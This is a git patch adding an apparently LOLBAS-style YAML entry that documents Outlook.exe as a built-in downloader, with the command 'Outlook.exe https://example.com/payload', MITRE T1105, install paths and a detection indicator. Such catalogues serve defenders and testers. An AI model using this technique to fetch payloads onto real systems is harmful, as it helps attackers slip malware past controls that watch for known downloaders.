From 0c0e242481037c01ee35504d451b777006338516 Mon Sep 17 00:00:00 2001
From: C-h4ck-0 <48152831+C-h4ck-0@users.noreply.github.com>
Date: Tue, 8 Nov 2022 21:53:10 +0700
Subject: [PATCH] Add Outlook.exe downloader

---
 yml/OtherMSBinaries/Outlook.yml | 34 +++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 yml/OtherMSBinaries/Outlook.yml

diff --git a/yml/OtherMSBinaries/Outlook.yml b/yml/OtherMSBinaries/Outlook.yml
new file mode 100644
index 0000000..a7efcf3
--- /dev/null
+++ b/yml/OtherMSBinaries/Outlook.yml
@@ -0,0 +1,34 @@
+---
+Name: Outlook.exe
+Description: Microsoft Office component
+Author: Nir Chako
+Created: 2022-11-08
+Commands:
+  - Command: Outlook.exe https://example.com/payload
+    Description: Downloads payload from remote server
+    Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
+  - Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+  - Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
+Detection:
+  - IOC: Suspicious Office application internet/network traffic
+Acknowledgement:
+  - Person: Nir Chako (Pentera)
+    Handle: '@C_h4ck_0'